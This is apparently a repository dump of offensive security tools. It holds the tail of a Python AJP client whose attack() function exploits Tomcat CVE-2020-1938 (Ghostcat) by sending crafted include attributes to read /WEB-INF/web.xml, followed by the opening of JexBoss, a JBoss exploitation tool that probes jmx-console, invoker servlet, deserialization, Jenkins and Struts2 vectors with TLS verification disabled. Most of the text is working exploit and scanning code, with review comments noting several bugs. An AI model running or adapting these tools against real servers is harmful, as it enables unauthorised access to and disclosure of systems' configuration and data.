        given; nothing here checks its return value.
        """
        while True:
            data = self.serialize()
            socket.send(data)
            r = AjpResponse.receive(stream)
            while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
                r = AjpResponse.receive(stream)

            # len(data) == 4 is the header-only (empty) frame: the body is done.
            if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
                break
85 |
86 |
class AjpForwardRequest(object):
    """Builder and (partial) parser for an AJP13 "Forward Request" packet (prefix code 0x02).

    Fields are plain attributes filled in by the caller (see
    prepare_ajp_forward_request); serialize() produces the wire form and
    send_and_receive() drives one request/response exchange over a connected
    socket, collecting the AjpResponse packets that come back.
    """
    # HTTP method codes as AJP numbers them: the tuple index is the wire value
    # (slot 0 is unused, so OPTIONS is 1, GET is 2, ...).
    _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(
        28)
    # Method name -> code, used by Tomcat.perform_request; an unknown name maps to None.
    REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE,
                       'TRACE': TRACE}
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    # Request headers with a compact 0xA0xx encoding; wire code == index + 1
    # (see pack_headers and parse).
    COMMON_HEADERS = ["SC_REQ_ACCEPT",
                      "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE",
                      "SC_REQ_AUTHORIZATION",
                      "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE",
                      "SC_REQ_COOKIE2",
                      "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
                      ]
    # Request attribute names; wire code == index + 1 (see pack_attributes).
    ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert",
                  "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]

    def __init__(self, data_direction=None):
        # Fixed prefix for a forward request; every other field is None until set by the caller.
        self.prefix_code = 0x02
        self.method = None
        self.protocol = None
        self.req_uri = None
        self.remote_addr = None
        self.remote_host = None
        self.server_name = None
        self.server_port = None
        self.is_ssl = None
        self.num_headers = None
        self.request_headers = None
        self.attributes = None
        self.data_direction = data_direction

    def pack_headers(self):
        """Encode request_headers: 2-byte count, then one (name, value) pair per header.

        A name starting with "SC_REQ" is sent as 0xA0 plus its 1-based index in
        COMMON_HEADERS (list.index raises ValueError for an SC_REQ name that is
        not listed); any other name is sent as an AJP string. Values are always
        AJP strings. Side effect: sets self.num_headers.
        """
        self.num_headers = len(self.request_headers)
        res = ""  # immediately overwritten below; harmless leftover
        res = struct.pack(">h", self.num_headers)
        for h_name in self.request_headers:
            if h_name.startswith("SC_REQ"):
                code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
                res += struct.pack("BB", 0xA0, code)
            else:
                res += pack_string(h_name)

            res += pack_string(self.request_headers[h_name])
        return res

    def pack_attributes(self):
        """Encode self.attributes (list of {'name', 'value'} dicts) and the 0xFF terminator.

        Each entry is a 1-byte code (1-based index in ATTRIBUTES) followed by its
        value as an AJP string; a "req_attribute" entry carries a (name, value)
        pair and is encoded as two strings.
        """
        res = b""
        for attr in self.attributes:
            a_name = attr['name']
            code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
            res += struct.pack("b", code)
            if a_name == "req_attribute":
                aa_name, a_value = attr['value']
                res += pack_string(aa_name)
                res += pack_string(a_value)
            else:
                res += pack_string(attr['value'])
        res += struct.pack("B", 0xFF)
        return res

    def serialize(self):
        """Return the complete packet: 4-byte header (magic + payload length) followed by the payload.

        Payload order: prefix code, method, protocol, req_uri, remote_addr,
        remote_host, server_name, server_port, is_ssl, headers, attributes.
        The length field is a signed 16-bit value, so struct.pack raises for a
        payload longer than 32767 bytes.
        """
        res = ""  # immediately overwritten below; harmless leftover
        res = struct.pack("bb", self.prefix_code, self.method)
        res += pack_string(self.protocol)
        res += pack_string(self.req_uri)
        res += pack_string(self.remote_addr)
        res += pack_string(self.remote_host)
        res += pack_string(self.server_name)
        res += struct.pack(">h", self.server_port)
        res += struct.pack("?", self.is_ssl)
        res += self.pack_headers()
        res += self.pack_attributes()
        if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbh", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbh", 0x41, 0x42, len(res))
        return header + res

    def parse(self, raw_packet):
        """Populate this object from a raw forward-request packet (inverse of serialize, headers only).

        NOTE(review): not called anywhere in the visible code and looks
        Python-2 era: io.StringIO yields str while struct.unpack needs bytes,
        the "bbH" format here is the only one without an explicit ">" byte
        order, and server_port, is_ssl and a custom-header name are left as
        1-tuples (no trailing comma on the unpack). Attributes are not parsed.
        """
        stream = StringIO(raw_packet)
        self.magic1, self.magic2, data_len = unpack(stream, "bbH")
        self.prefix_code, self.method = unpack(stream, "bb")
        self.protocol = unpack_string(stream)
        self.req_uri = unpack_string(stream)
        self.remote_addr = unpack_string(stream)
        self.remote_host = unpack_string(stream)
        self.server_name = unpack_string(stream)
        self.server_port = unpack(stream, ">h")
        self.is_ssl = unpack(stream, "?")
        self.num_headers, = unpack(stream, ">H")
        self.request_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            # Codes above 0xA000 index COMMON_HEADERS; anything else is a length-prefixed name.
            if code > 0xA000:
                h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
            else:
                h_name = unpack(stream, "%ds" % code)
                stream.read(1) # \0
            h_value = unpack_string(stream)
            self.request_headers[h_name] = h_value

    def send_and_receive(self, socket, stream, save_cookies=False):
        """Send the serialized request and collect the response packets.

        Returns a list of AjpResponse objects: the SEND_HEADERS packet first,
        then every SEND_BODY_CHUNK, then the END_RESPONSE packet. For a POST the
        list is returned empty right after sending (the body is expected to be
        streamed separately). Any other packet type raises NotImplementedError.

        NOTE(review): with save_cookies=True the cookie is written to
        self.headers, which this class never defines (the dict is
        self.request_headers), so that path raises AttributeError. The assert
        on the first packet is stripped under python -O. sendall() returns
        None, so `i` is never meaningful.
        """
        res = []
        i = socket.sendall(self.serialize())
        if self.method == AjpForwardRequest.POST:
            return res

        r = AjpResponse.receive(stream)
        assert r.prefix_code == AjpResponse.SEND_HEADERS
        res.append(r)
        if save_cookies and 'Set-Cookie' in r.response_headers:
            self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

        # read body chunks and end response packets
        while True:
            r = AjpResponse.receive(stream)
            res.append(r)
            if r.prefix_code == AjpResponse.END_RESPONSE:
                break
            elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
                continue
            else:
                raise NotImplementedError
                break  # unreachable: the raise above leaves the loop

        return res
214 |
215 |
class AjpResponse(object):
    """One container->server AJP13 packet, decoded by parse() according to its prefix code.

    Which attributes exist after parse() depends on the packet type: see the
    parse_* methods. receive() is the usual entry point.
    """
    # Prefix codes: 3 SEND_BODY_CHUNK, 4 SEND_HEADERS, 5 END_RESPONSE, 6 GET_BODY_CHUNK.
    _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
    # Response headers with the compact 0xA0xx encoding; wire code == index + 1.
    COMMON_SEND_HEADERS = [
        "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
        "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
    ]

    def parse(self, stream):
        """Read the packet header (magic, data length, prefix code) and dispatch on the prefix.

        Raises NotImplementedError for any prefix code other than the four
        listed above. Returns None; parse_get_body_chunk's return value is dropped.
        """
        # read headers
        self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

        if self.prefix_code == AjpResponse.SEND_HEADERS:
            self.parse_send_headers(stream)
        elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
            self.parse_send_body_chunk(stream)
        elif self.prefix_code == AjpResponse.END_RESPONSE:
            self.parse_end_response(stream)
        elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
            self.parse_get_body_chunk(stream)
        else:
            raise NotImplementedError

    def parse_send_headers(self, stream):
        """Decode a SEND_HEADERS body: status code, status message and the header dict.

        Sets http_status_code, http_status_msg, num_headers and response_headers.
        A custom header name is read as a length-prefixed string and stored as
        returned by unpack (bytes on Python 3), whereas a common header name is
        the str from COMMON_SEND_HEADERS, so the dict can mix key types.
        """
        self.http_status_code, = unpack(stream, ">H")
        self.http_status_msg = unpack_string(stream)
        self.num_headers, = unpack(stream, ">H")
        self.response_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code <= 0xA000: # custom header
                h_name, = unpack(stream, "%ds" % code)
                stream.read(1) # \0
                h_value = unpack_string(stream)
            else:
                h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
                h_value = unpack_string(stream)
            self.response_headers[h_name] = h_value

    def parse_send_body_chunk(self, stream):
        """Decode a SEND_BODY_CHUNK body: 2-byte length, then the chunk bytes into self.data.

        One extra byte is read beyond the announced length (presumably the
        chunk's trailing \0) and it is kept at the end of self.data.
        """
        self.data_length, = unpack(stream, ">H")
        self.data = stream.read(self.data_length + 1)

    def parse_end_response(self, stream):
        """Decode an END_RESPONSE body: the single 'reuse connection' byte into self.reuse."""
        self.reuse, = unpack(stream, "b")

    def parse_get_body_chunk(self, stream):
        """Decode a GET_BODY_CHUNK body and return the requested length.

        Nothing is stored on self; parse() ignores the return value.
        """
        rlen, = unpack(stream, ">H")
        return rlen

    @staticmethod
    def receive(stream):
        """Read and parse one packet from *stream*, returning the new AjpResponse."""
        r = AjpResponse()
        r.parse(stream)
        return r
270 |
271 |
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
    """Build a server->container AjpForwardRequest for *req_uri* on *target_host*.

    Fixed choices: protocol HTTP/1.1, remote_addr and server_name both set to
    target_host, no remote_host, server_port 80, not SSL, a small browser-like
    header set and an empty attribute list. Callers add headers and attributes
    afterwards (see Tomcat.perform_request).
    """
    request = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
    fixed_fields = {
        "method": method,
        "protocol": "HTTP/1.1",
        "req_uri": req_uri,
        "remote_addr": target_host,
        "remote_host": None,
        "server_name": target_host,
        "server_port": 80,
        "is_ssl": False,
        "attributes": [],
    }
    for field_name, value in fixed_fields.items():
        setattr(request, field_name, value)
    request.request_headers = {
        'SC_REQ_ACCEPT': 'text/html',
        'SC_REQ_CONNECTION': 'keep-alive',
        'SC_REQ_CONTENT_LENGTH': '0',
        'SC_REQ_HOST': target_host,
        'SC_REQ_USER_AGENT': 'Mozilla',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.5',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0'
    }
    return request
295 |
296 |
class Tomcat(object):
    """Minimal AJP13 client: connects in __init__ and sends one forward request per perform_request().

    The socket opened here is never closed by this class (no close() method,
    no context-manager support).
    """
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port
        self.socket = socket(AF_INET, SOCK_STREAM)
        self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.socket.connect((target_host, target_port))
        # Unbuffered binary file view of the socket; AjpResponse.receive reads from it.
        self.stream = self.socket.makefile("rb", buffering=0)

    # NOTE(review): headers={} and attributes=[] are shared mutable defaults;
    # the body only reads them, so nothing is corrupted today, but None-defaults
    # would be the safe form.
    def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
        """Send one forward request for *req_uri* and return (send-headers packet, body-chunk packets).

        Args:
            req_uri: request URI placed in the AJP packet.
            headers: extra request headers merged over the defaults from
                prepare_ajp_forward_request.
            method: HTTP method name; looked up in REQUEST_METHODS, an unknown
                name yields None and breaks serialize().
            user, password: when both are given a Basic Authorization header is
                added. NOTE(review): str.encode('base64') is Python 2 only; on
                Python 3 it raises LookupError, so this branch cannot work there.
            attributes: list of {'name', 'value'} dicts appended to the request.

        Returns:
            (None, None) when no packets came back; otherwise the first packet
            (SEND_HEADERS) and the list of packets between it and the final
            END_RESPONSE.
        """
        self.req_uri = req_uri
        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
                                                           method=AjpForwardRequest.REQUEST_METHODS.get(method))
        print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
        if user is not None and password is not None:
            self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + (
                "%s:%s" % (user, password)).encode('base64').replace('\n', '')
        for h in headers:
            self.forward_request.request_headers[h] = headers[h]
        for a in attributes:
            self.forward_request.attributes.append(a)
        responses = self.forward_request.send_and_receive(self.socket, self.stream)
        if len(responses) == 0:
            return None, None
        snd_hdrs_res = responses[0]
        data_res = responses[1:-1]
        if len(data_res) == 0:
            print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
        return snd_hdrs_res, data_res
326 |
327 |
def attack(URL):
    """Entry point for the CVE-2020-1938 check against *URL*.

    URL is split on ':' to extract the host (the text after '//') and an
    optional port. Without a port only 8009 is probed; with a port that port is
    probed first and then 8009 unless it already was 8009. Each probe is the
    same block of code: open a Tomcat connection, send one forward request via
    perform_request and print the first body chunk decoded as UTF-8. Anything
    raised inside a probe is printed with 'Some error!' and swallowed (including
    IndexError when no body chunk came back); a URL that does not split into
    2 or 3 parts prints 'url error'.
    """
    print('[+]开始检测-Tomcat-CVE-2020-1938。[+]')
    # URL without a port
    if len(URL.split(':')) == 2:
        port = 8009
        print('port',port)
        print('ip',URL.split(':')[1][2:])
        try:
            t = Tomcat(URL.split(':')[1][2:], port)
            _, data = t.perform_request('/asdf', attributes=[
                {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
            ])
            print('----------------------------')
            print(type(data))
            print(data[0].data.decode('UTF-8'))
        except Exception as e:
            print(e,'Some error!')

    # URL with a port
    elif len(URL.split(':')) == 3:
        print('ip',URL.split(':')[1][2:])
        print('port',URL.split(':')[2])
        try:
            # int() of the third part fails with ValueError for a URL that has a
            # path after the port (e.g. "8080/x"); here that is caught below.
            t = Tomcat(URL.split(':')[1][2:], int(URL.split(':')[2]))
            _, data = t.perform_request('/asdf', attributes=[
                {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
            ])
            print('----------------------------')
            print(type(data))
            print(data[0].data.decode('UTF-8'))
        except Exception as e:
            print(e,'Some error!')
        print('=================================')
        # NOTE(review): this int() is outside any try, so the same malformed
        # port/path text raises ValueError out of attack() here.
        if int(URL.split(':')[2]) != 8009:
            print('ip', URL.split(':')[1][2:])
            print('port', 8009)
            try:
                t = Tomcat(URL.split(':')[1][2:], 8009)
                _, data = t.perform_request('/asdf', attributes=[
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                    {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
                ])
                print('----------------------------')
                print(type(data))
                print(data[0].data.decode('UTF-8'))
            except Exception as e:
                print(e,'Some error!')
        else:
            pass
    else:
        print('url error')
    print('[+]检测结束-Tomcat-CVE-2020-1938。[+]')
    print('\n')
386 |
387 |
if __name__ == '__main__':
    # NOTE(review): attack() takes a required URL argument (see its definition
    # above), so running this file as a script raises TypeError here.
    attack()
390 |
--------------------------------------------------------------------------------
/jboss/jexboss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | """
4 | JexBoss: Jboss verify and EXploitation Tool
5 | https://github.com/joaomatosf/jexboss
6 |
7 | Copyright 2013 João Filho Matos Figueiredo
8 |
9 | Licensed under the Apache License, Version 2.0 (the "License");
10 | you may not use this file except in compliance with the License.
11 | You may obtain a copy of the License at
12 |
13 | http://www.apache.org/licenses/LICENSE-2.0
14 |
15 | Unless required by applicable law or agreed to in writing, software
16 | distributed under the License is distributed on an "AS IS" BASIS,
17 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 | See the License for the specific language governing permissions and
19 | limitations under the License.
20 | """
21 | import textwrap
22 | import traceback
23 | import logging
24 | import datetime
25 | import signal
26 | import _exploits
27 | import _updates
28 | from os import name, system
29 | import os, sys
30 | import shutil
31 | from zipfile import ZipFile
32 | from time import sleep
33 | from random import randint
34 | import argparse, socket
35 | from sys import argv, exit, version_info
# Route warnings.warn() output into the log instead of stderr.
logging.captureWarnings(True)
FORMAT = "%(asctime)s (%(levelname)s): %(message)s"
# One log file per calendar day, named after today's date, at INFO and above.
logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO)

__author__ = "João Filho Matos Figueiredo "
__version__ = "1.2.4"

# ANSI SGR escape sequences for terminal colouring; NORMAL and ENDC both reset.
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
50 |
51 |
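def print_and_flush(message, same_line=False):
    """Print *message*, omitting the trailing newline when *same_line* is true.

    stdout is flushed afterwards when it is not a terminal, so output appears
    promptly when the tool is piped or redirected to a file.

    Args:
        message: text to write.
        same_line: when true the cursor stays on the same line so the next call
            continues it.
    """
    if same_line:
        # The original used the Python 2 trailing-comma form ``print (msg),``;
        # under Python 3 that is ``print(msg)`` followed by a no-op tuple, so the
        # newline was never suppressed. Writing directly to stdout works on both.
        sys.stdout.write(message)
    else:
        print(message)
    if not sys.stdout.isatty():
        sys.stdout.flush()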
59 |
60 |
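# Refuse to run on Python 2.6: the tool relies on 2.7+ features.
if version_info[0] == 2 and version_info[1] < 7:
    print_and_flush(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n"
                    "" + GREEN + " Please install the Python version >= 2.7. \n\n"
                    " Example for CentOS using Software Collections scl:\n"
                    " # yum -y install centos-release-scl\n"
                    " # yum -y install python27\n"
                    " # scl enable python27 bash\n" + ENDC)
    # logging.critical is the function; the original called logging.CRITICAL,
    # which is the int level constant, so it raised TypeError instead of logging.
    logging.critical('Python version 2.6 is not supported.')
    exit(0)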
70 |
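# readline is optional: without it the interactive shell just loses line editing.
try:
    import readline
    readline.parse_and_bind('set editing-mode vi')
# Narrowed from a bare except, which also swallowed KeyboardInterrupt/SystemExit;
# exc_info=True attaches the current exception (the original passed the traceback
# module, which only worked because any truthy value triggers the same lookup).
except Exception:
    logging.warning('Module readline not installed. The terminal will not support the arrow keys.', exc_info=True)
    print_and_flush(RED1 + "\n * Module readline not installed. The terminal will not support the arrow keys.\n" + ENDC)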
77 |
78 |
79 | try:
80 | from urllib.parse import urlencode
81 | except ImportError:
82 | from urllib import urlencode
83 |
84 | try:
85 | from urllib3.util import parse_url
86 | from urllib3 import PoolManager
87 | from urllib3 import ProxyManager
88 | from urllib3 import make_headers
89 | from urllib3.util import Timeout
90 | except ImportError:
91 | print_and_flush(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n"
92 | "" + GREEN + " Example: \n"
93 | " # pip install -r requires.txt\n" + ENDC)
94 | logging.critical('Module urllib3 not installed. See details:', exc_info=traceback)
95 | exit(0)
96 |
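# ipaddress is required; on Python 3 it is in the standard library.
try:
    import ipaddress
# Only a missing module is the dependency problem this message describes; the
# original bare except also caught KeyboardInterrupt and reported it as a
# missing package.
except ImportError:
    print_and_flush(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n"
                    "" + GREEN + " Example: \n"
                    " # pip install -r requires.txt\n" + ENDC)
    logging.critical('Module ipaddress not installed. See details:', exc_info=True)
    exit(0)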
105 |
# `global` at module level is a no-op: these names are module globals anyway.
# gl_interrupted is set by handler_interrupt and read by check_vul;
# gl_http_pool is bound in configure_http_pool; gl_args is read throughout but
# not assigned anywhere in the visible code.
global gl_interrupted
gl_interrupted = False
global gl_args
global gl_http_pool
110 |
111 |
def get_random_user_agent():
    """Return one entry, chosen uniformly via randint, from a fixed list of browser User-Agent strings."""
    candidates = (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
        "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
        "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
        "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
    )
    last_index = len(candidates) - 1
    return candidates[randint(0, last_index)]
128 |
129 |
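def is_proxy_ok():
    """Probe gl_args.host through the configured proxy and report whether the proxy is usable.

    Reads the module globals ``gl_args`` (``.host``, ``.proxy``) and
    ``gl_http_pool`` (set up by configure_http_pool).

    Returns:
        False when the request fails, when the proxy demands authentication
        (407) or reports the service unavailable (502/503); True otherwise.
        Each failure is printed and logged.
    """
    print_and_flush(GREEN + "\n ** Checking proxy: %s **\n\n" % gl_args.proxy)

    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": get_random_user_agent()}
    try:
        r = gl_http_pool.request('GET', gl_args.host, redirect=False, headers=headers)
    # Narrowed from a bare except: that clause also swallowed KeyboardInterrupt
    # and SystemExit, turning Ctrl-C during the probe into "failed to connect".
    except Exception:
        print_and_flush(RED + " * Error: Failed to connect to %s using proxy %s.\n"
                        " See logs for more details...\n" %(gl_args.host,gl_args.proxy) + ENDC)
        logging.warning("Failed to connect to %s using proxy" %gl_args.host, exc_info=True)
        return False

    if r.status == 407:
        print_and_flush(RED + " * Error 407: Proxy authentication is required. \n"
                        " Please enter the correct login and password for authentication. \n"
                        " Example: -P http://proxy.com:3128 -L username:password\n" + ENDC)
        logging.error("Proxy authentication failed")
        return False

    if r.status in (502, 503):
        print_and_flush(RED + " * Error %s: The service %s is not availabel to your proxy. \n"
                        " See logs for more details...\n" %(r.status,gl_args.host)+ENDC)
        logging.error("Service unavailable to your proxy")
        return False

    return True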
158 |
159 |
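def configure_http_pool():
    """Create the module-level ``gl_http_pool`` from ``gl_args`` (proxy, credentials, mode, timeout).

    Scan modes get short fixed timeouts; other modes use gl_args.timeout for
    the connect phase. With a proxy, both the host (if given) and the proxy
    URL must carry an http/https scheme, otherwise the process exits with
    status 1; a failure to build the ProxyManager also exits with 1.

    Note: every pool is built with cert_reqs='CERT_NONE', i.e. TLS server
    certificates are not validated for any request the tool makes.
    """

    global gl_http_pool

    if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan':
        timeout = Timeout(connect=1.0, read=3.0)
    else:
        timeout = Timeout(connect=gl_args.timeout, read=6.0)

    if gl_args.proxy:
        # when using proxy, protocol should be informed
        host_missing_scheme = gl_args.host is not None and 'http' not in gl_args.host
        if host_missing_scheme or 'http' not in gl_args.proxy:
            # Name the offending value without touching gl_args.host when it is
            # None: the original evaluated `'http' not in gl_args.host` here
            # unconditionally and raised TypeError for a missing host.
            offender = gl_args.host if host_missing_scheme else gl_args.proxy
            print_and_flush(RED + " * When using proxy, you must specify the http or https protocol"
                            " (eg. http://%s).\n\n" % offender + ENDC)
            logging.critical('Protocol not specified')
            exit(1)

        try:
            if gl_args.proxy_cred:
                headers = make_headers(proxy_basic_auth=gl_args.proxy_cred)
                gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, proxy_headers=headers, timeout=timeout, cert_reqs='CERT_NONE')
            else:
                gl_http_pool = ProxyManager(proxy_url=gl_args.proxy, timeout=timeout, cert_reqs='CERT_NONE')
        # Narrowed from a bare except so KeyboardInterrupt/SystemExit propagate.
        except Exception:
            print_and_flush(RED + " * An error occurred while setting the proxy. Please see log for details..\n\n" +ENDC)
            logging.critical('Error while setting the proxy', exc_info=True)
            exit(1)
    else:
        gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')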
189 |
190 |
def handler_interrupt(signum, frame):
    """SIGINT handler: flag the run as interrupted, announce it on stdout and in the log, exit with status 1.

    *signum* and *frame* are the standard signal-handler arguments; neither is used.
    """
    global gl_interrupted
    gl_interrupted = True
    notice = "Interrupting execution ..."
    print_and_flush(notice)
    logging.info(notice)
    exit(1)
197 |
198 | signal.signal(signal.SIGINT, handler_interrupt)
199 |
200 |
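def check_connectivity(host, port):
    """Return True when a TCP connection to host:port can be opened within 2 seconds.

    Any failure (timeout, refused connection, name-resolution error, a port
    that is not an integer) is logged at INFO level and reported as False
    rather than raised.

    Args:
        host: hostname or IP address; passed through str().
        port: TCP port; passed through int().
    """
    try:
        # create_connection applies the timeout and closes the socket itself
        # when connect() fails; the original left a half-initialised socket
        # open on every failure.
        conn = socket.create_connection((str(host), int(port)), timeout=2)
    # OSError covers socket.timeout and socket.gaierror; ValueError covers a
    # bad port. The original bare except also swallowed KeyboardInterrupt.
    except (OSError, ValueError):
        logging.info("Failed to connect to %s:%s" % (host, port))
        return False
    conn.close()
    return True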
215 |
216 |
217 | def check_vul(url):
218 | """
219 | Test if a GET to a URL is successful
220 | :param url: The URL to test
221 | :return: A dict with the exploit type as the keys, and the HTTP status code as the value
222 | """
223 | url_check = parse_url(url)
224 | if '443' in str(url_check.port) and url_check.scheme != 'https':
225 | url = "https://"+str(url_check.host)+":"+str(url_check.port)+str(url_check.path)
226 |
227 | print_and_flush(GREEN + "\n ** Checking Host: %s **\n" % url)
228 | logging.info("Checking Host: %s" % url)
229 |
230 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
231 | "Connection": "keep-alive",
232 | "User-Agent": get_random_user_agent()}
233 |
234 | paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
235 | "web-console": "/web-console/Invoker",
236 | "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
237 | "admin-console": "/admin-console/",
238 | "Application Deserialization": "",
239 | "Servlet Deserialization" : "",
240 | "Jenkins": "",
241 | "Struts2": "",
242 | "JMX Tomcat" : ""}
243 |
244 | fatal_error = False
245 |
246 | for vector in paths:
247 | r = None
248 | if gl_interrupted: break
249 | try:
250 |
251 | # check jmx tomcat only if specifically chosen
252 | if (gl_args.jmxtomcat and vector != 'JMX Tomcat') or\
253 | (not gl_args.jmxtomcat and vector == 'JMX Tomcat'): continue
254 |
255 | if gl_args.app_unserialize and vector != 'Application Deserialization': continue
256 |
257 | if gl_args.struts2 and vector != 'Struts2': continue
258 |
259 | if gl_args.servlet_unserialize and vector != 'Servlet Deserialization': continue
260 |
261 | if gl_args.jboss and vector not in ('jmx-console', 'web-console', 'JMXInvokerServlet', 'admin-console'): continue
262 |
263 | if gl_args.jenkins and vector != 'Jenkins': continue
264 |
265 | if gl_args.force:
266 | paths[vector] = 200
267 | continue
268 |
269 | print_and_flush(GREEN + " [*] Checking %s: %s" % (vector, " " * (27 - len(vector))) + ENDC, same_line=True)
270 |
271 | # check jenkins
272 | if vector == 'Jenkins':
273 |
274 | cli_port = None
275 | # check version and search for CLI-Port
276 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
277 | all_headers = r.getheaders()
278 |
279 | # versions > 658 are not vulnerable
280 | if 'X-Jenkins' in all_headers:
281 | version = int(all_headers['X-Jenkins'].split('.')[1].split('.')[0])
282 | if version >= 638:
283 | paths[vector] = 505
284 | continue
285 |
286 | for h in all_headers:
287 | if 'CLI-Port' in h:
288 | cli_port = int(all_headers[h])
289 | break
290 |
291 | if cli_port is not None:
292 | paths[vector] = 200
293 | else:
294 | paths[vector] = 505
295 |
